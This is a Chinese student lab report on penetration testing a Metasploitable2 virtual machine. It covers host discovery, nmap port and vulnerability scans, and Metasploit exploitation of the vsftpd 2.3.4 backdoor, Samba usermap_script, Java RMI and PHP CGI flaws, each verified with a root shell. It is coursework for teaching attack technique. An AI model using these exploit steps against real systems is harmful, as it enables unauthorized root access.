20232328 2025-2026-1 《网络与系统攻防技术》实验六实验报告

news/2025/11/17 17:35:45/文章来源:https://www.cnblogs.com/mzy-seven/p/19233485

1.实验内容

  • 1.1主机发现与端口扫描
  • 1.2 Vsftpd源码包后门漏洞(21端口)
  • 1.3 SambaMS-RPC Shell命令注入漏洞(端口139)
  • 1.4 Java RMI SERVER命令执行漏洞(1099端口)
  • 1.5 PHP CGI参数执行注入漏洞(80端口)

2.实验准备

通过https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/ 点击下载zip文件
image
下载完成后进行解压,然后打开虚拟机,点文件中的扫描虚拟机

image
选择刚才解压的文件,然后勾选虚拟机,点完成

3.实验过程

3.1前期渗透

3.1.1主机渗透
首先在刚才安装的Metasploitable2主机上获取IP地址,输入iconfig
可以看到我的ip为:192.168.211.146
image
到kali虚拟机中打开msfconsole使用ARP中的arp_sweep进行主机发现

msfconsole  #打开Metasploit
search arp_sweep  #搜索ARP扫描相关辅助模块
use 0 #使用搜索结果中的第一个模块
set RHOSTS 192.168.211.0/24  #扫描虚拟机所在的网段
run  #开始扫描

image

根据扫描结果得出:靶机在线,网卡标识为VMWare,Inc.,证明这是VMWare虚拟机

3.1.2端口和版本扫描
这里采用windows主机下利用nmap进行端口扫描,因为我的kali使用nmap扫描的缓慢
运行下面命令来进行对靶机进行端口扫描和版本探测:

 nmap -sS -sV 192.168.211.146

image
可以看出靶机的版本为 metasploitable

3.1.3漏洞扫描
同理,在windows下使用nmap工具对靶机进行漏洞扫描,命令如下:

nmap -script=vuln 192.168.211.146

这个过程可能会有点长,经过实践kali终端的运行速度比windows终端快
扫描结果如下:

21端口

image

  • 服务与漏洞:目标主机的 21/tcp 端口运行 FTP 服务,存在vsFTPd版本2.3.4后门漏洞。
  • 漏洞编号:BID:48539、CVE:CVE-2011-2523。
  • 漏洞危害:该漏洞可被利用获取 root 权限(从 “Shell command: id” 的结果 “uid=0 (root) gid=0 (root)” 可验证),属于高危可利用漏洞。

25端口:

image
image

  • 服务:25/tcp 端口运行 SMTP 服务。
  • 漏洞类型:涉及 SSL/TLS 协议的多个加密漏洞,包括匿名 Diffie-Hellman 密钥交换中间人漏洞、Logjam 漏洞、DH 组强度不足漏洞、POODLE 信息泄露漏洞

漏洞详情

  1. 匿名 Diffie-Hellman 密钥交换中间人漏洞
  • 风险等级:高危。
  • 技术说明:使用匿名 DH 组 1(1024 位),易被中间人攻击,可完全破坏会话的机密性和完整性
  1. Logjam 漏洞(CVE-2015-4000)
  • 风险等级:高危。
  • 技术说明:支持 DHE_EXPORT 密码套件,可被降级到 512 位加密,攻击者易破解并篡改数据流。
  1. Diffie-Hellman 组强度不足漏洞
  • 风险等级:高危。
  • 技术说明:使用弱 DH 组 1(1024 位),易被被动窃听。
  1. SSL POODLE 信息泄露漏洞(CVE-2014-3566)
  • 风险等级:高危。
  • 技术说明:存在 SSL 3.0 或 CBC 填充 oracle 问题,易被获取明文数据。

1099端口:

image
RMI 注册表默认配置远程代码执行漏洞

  • 风险等级:高危。
  • 技术说明:RMI 注册表默认配置允许从远程 URL 加载类,可导致远程代码执行。
  • 修复建议:修改 RMI 注册表配置,禁用远程类加载功能,或对 RMI 通信实施严格的访问控制。

5432端口:

image
SSL/TLS MITM 漏洞(CCS 注入,CVE-2014-0224)

  • 风险等级:高危。
  • 技术说明:OpenSSL 存在漏洞,中间人攻击者可通过伪造 TLS 握手触发使用零长度主密钥,进而劫持会话或获取敏感信息。
  • 修复建议:升级 OpenSSL 到安全版本(0.9.8za、1.0.0m、1.0.1h 及以上),禁用存在漏洞的 SSL/TLS 配置。

SSL/TLS MITM 漏洞(CCS 注入,CVE-2014-0224)

  • 风险等级:高危。
  • 技术说明:OpenSSL 存在漏洞,中间人攻击者可通过伪造 TLS 握手触发使用零长度主密钥,进而劫持会话或获取敏感信息。
  • 修复建议:升级 OpenSSL 到安全版本(0.9.8za、1.0.0m、1.0.1h 及以上),禁用存在漏洞的 SSL/TLS 配置。

Diffie-Hellman 组强度不足漏洞

  • 风险等级:高危。
  • 技术说明:使用弱 DH 组 1(1024 位),易被被动窃听。
  • 修复建议:升级到 2048 位及以上的强 DH 组

SSL POODLE 信息泄露漏洞(CVE-2014-3566)

  • 风险等级:高危。
  • 技术说明:存在 SSL 3.0 或 CBC 填充 oracle 问题,易被获取明文数据。
  • 修复建议:禁用 SSL 3.0 和存在漏洞的 CBC 密码套件,优先使用 TLS 1.2 及以上版本。

3.2Vsftpd源码包后门漏洞(21端口)

在kali中执行msfconsole,代码如下:

use exploit/unix/ftp/vsftpd_234_backdoor 
set RHOST 192.168.211.146
run

image
然后执行uname –a、 pwd、 id等命令验证
image

3.3 SambaMS-RPC Shell命令注入漏洞(端口139)

在kali中执行msfconsole,代码如下:

use exploit/multi/samba/usermap_script 
set RHOST 192.168.211.146  
exploit 

image
然后执行uname -a进行验证
image
得出确认目标主机为 Metasploitable 2 靶机,

  • 内核版本:2.6.24-16-server
  • 系统架构:i686(32 位系统)
  • 系统类型:GNU/Linux(基于 Linux 内核的类 Unix 系统)
  • 编译时间:2008年4月10日(距今多年,无后续安全更新)

3.4Java RMI SERVER命令执行漏洞(1099端口)

根据前面的实验步骤已经确定1099端口开放且存在漏洞
在kali中执行msfconsole,代码如下:

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.211.146 
run

image
执行sessions -i id操作,切换 / 交互已建立的 shell 会话,结果如下:
image
这里没有第二个会话所以报错了

使用shell 和whoami验证,首先使用shell进入进程,然后使用whoami验证得出root
image

3.5PHP CGI参数执行注入漏洞(80端口)

在kali中执行msfconsole ,代码如下:

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.211.146   
run 

image
然后输入shell进入进程,输入whoami进行验证

image

4.实验问题及解决方案

问题一:使用sessions -i id操作切换2时,因为没有第二个会话,发生报错之后,退出了这个会话。于是重新使用命令时,由于1会话并没有结束,会出现当前会话1正在使用的提示

image
问题一解决方案:使用exit -y退出会话
image

5.学习感悟和思考

通过本次 Metasploit 实践,我熟练掌握了主机发现、端口扫描、漏洞利用的完整渗透流程,对 vsftpd 后门、Samba 注入等经典漏洞的原理与利用逻辑有了直观认知。
Metasploit 的模块化设计大幅降低了漏洞利用门槛,但精准配置参数、识别会话状态等细节仍需严谨操作。
靶机中多个高危漏洞的暴露,也让我深刻意识到真实环境中及时更新系统、关闭无用服务、修复漏洞的重要性。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/968151.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

这两个开源项目在世界互联网大会乌镇峰会获奖

Spring AI Alibaba 和 Higress 分别获得了开源先锋社区、开源优秀社区的称号,两位社区贡献者张圣航(GitHubID: shenghang)、刑国富(GitHubID: erasernoob)获得最具价值贡献者奖。2025 “直通乌镇”全球互联网大赛…

#2338. [22NOIP十连 Day 1] 数列

显然,自己不想实现的题就丢到这里来。 首先按照字典序贪心一定没毛病。 考虑按照红边建 DFS 树,如果你目前枚举到了树边,那么你就直接填最小的就是了,如果是非树边,将其没有填过的树边按照顺序最小到大填,然后这…

20232308 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容 1.1实验要求 掌握metasploit的用法 1.2实验内容 (1)发现Metasploitable2靶机,并对其进行端口扫描、漏洞扫描; (2)利用Vsftpd源码包后门漏洞; (3)利用SambaMS-RPC Shell命令注入漏洞; (4)利用Ja…

directory linux

当然可以!在 Linux 系统中,目录(directory)是文件系统中的一个组织结构单位,用于存储文件。以下是一些与目录相关的常见 Linux 命令和 Shell 脚本示例,帮助你更好地管理目录:一、常见目录相关命令 1. ls 命令 用…

deepin linux 安装

Deepin 是一个基于 Linux 的桌面操作系统,它基于 Debian/Ubuntu 构建,提供了丰富的桌面体验和良好的兼容性。如果你是在使用 Deepin Linux 的环境下进行安装或配置,以下是一些常见操作的 Linux 命令和 Shell 脚本示…

dbca linux

dbca 是 Oracle Database Configuration Assistant 的缩写,用于在 Linux 系统上安装、配置和管理 Oracle 数据库。它是一个命令行工具,用于执行数据库的安装、配置、启动、停止、备份、恢复等操作。 基本用法: dbca…

智慧建筑工地传感器参数一览表

重力传感器 卸扣式重力传感器 "量程0~3T,RS485输出(红﹢黑﹣绿A白B,modbus协议,5~12VDC供电(推荐10VDC),零点输出:≤1%F.S;灵敏度:1.0~2.0mV/V;非线性:≤0.5%F.S;滞后:≤+0.5%F.S;重复性:≤+0.5%…

2025靠谱留学机构推荐TOP5!美国/英国/澳洲多国申请,高录取率机构榜单

2025靠谱留学机构推荐TOP5!美国/英国/澳洲多国申请,高录取率机构榜单随着全球化教育的深入发展,留学申请需求持续攀升,优质的留学机构能为学生提供从选校规划到就业赋能的全链条支持,有效提升申请成功率与未来发展…

04-import 和 export

04-import 和 export$(".postTitle2").removeClass("postTitle2").addClass("singleposttitle");一个是导出,一个是导入 就是将组件导出和导入 导出的用法export 方式一:注意:导出和…

藜民百信消费帮扶平台:牵手 832 平台获殊荣,让兴和县农产品出圈、农户腰包鼓

在全国消费帮扶浪潮中,832 平台是连接贫困地区农产品与全国采购市场的重要枢纽。2015 年成立于内蒙古乌兰察布市兴和县的藜民百信,精心打造专属消费帮扶平台,通过深度牵手 832 平台,不仅斩获 “助农增收优秀供应商…

Ollama 部署 Qwen3:0.6B 模型操作记录

1. 安装前准备 系统要求操作系统: Windows 10/11, macOS 或 Linux 硬件要求:CPU: 至少4核处理器 内存: 8GB 或更高(推荐16GB) 存储: 至少有5GB可用空间 GPU: 可选(NVIDIA显卡推荐使用CUDA驱动)网络要求稳定的互联网…

LiveGBS GB28181监控视频平台中如何配置文字文印或图片水印,将水印叠加到播放器或视频内容中

监控视频通过GB28181协议接入到LiveGBS流媒体平台后,如果有加上特殊水印的需求,可以在通道配置里面自行配置。 LiveGBS国标GB28181平台既支持在前端播放窗口叠加水印,又支持服务器后台水印叠加到视频内容中。 1、前…

Linux 项目部署

安装docker后,拉取mysql及jdk镜像docker pull mysql:latest docker pull eclipse-temurin:8-jdk

curtime在MySQL触发器中的使用方法

在MySQL中,CURTIME()函数返回当前日期和时间。在触发器中使用CURTIME()函数可以帮助您在插入或更新记录时自动填充当前时间戳。以下是如何在MySQL触发器中使用CURTIME()函数的示例:创建一个名为my_table的表,其中包…

Frida Hook Android手册

Frida Hook Android手册Frida Hook Android手册 write by ppl on 2025/4 Frida的安装与配置 ​ 网上教程一大堆,略 连接 Android 设备 运行Frida服务端 $> adb shell su cd /data/local/tmp ./frida-server进行…

curtime与now函数在MySQL中的区别

CURTIME() 和 NOW() 是 MySQL 中两个常用的日期和时间函数,它们的主要区别在于返回的结果类型和用途。返回结果类型:CURTIME() 函数返回的是时间类型(TIME),格式为 ‘HH:MM:SS’。它只包含一天中的小时、分钟和秒…

Trick 总结

几何最小圆覆盖 \(\to\) 加点,圆半径由两或三个点决定。乱搞由先前答案剪枝,随机打乱枚举顺序大致只有 \(O(\log n)\) 次更新。

2025年最新出炉:车载电源十大品牌性能排行榜,光伏电源/氢能源车载直流转换器/新能源车载直流转换器/高功率密度电源/军用电源产品排行

行业分析:车载电源市场格局与技术创新趋势 随着新能源汽车产业的蓬勃发展,车载电源作为核心零部件的重要性日益凸显。根据最新市场调研数据显示,2025年全球车载电源市场规模预计突破千亿元,技术创新与产品质量成为…

成都恒利泰PIN-to-PIN 国产版 HT-LFCW-5500+

成都恒利泰PIN-to-PIN 国产版 HT-LFCW-5500+1、替代产品型号Mini-Circuits LFCW-5500+ 成都恒利泰出了 PIN-to-PIN 国产版 HT-LFCW-5500+, DC-5.5 GHz,LTCC-4Pin,2.01.25 mm。 抱着“小白鼠”心态申请了两片,今天把…

身份认证状态的存储与传递( Spring Boot篇 )

Spring Boot 登录信息获取机制摘要 Spring Boot 中浏览器获取登录信息的核心是通过身份凭证的存储与验证实现的,主要包括两种主流方案: Session+Cookie方案(经典方式) 服务端创建Session存储用户信息,生成唯一JSE…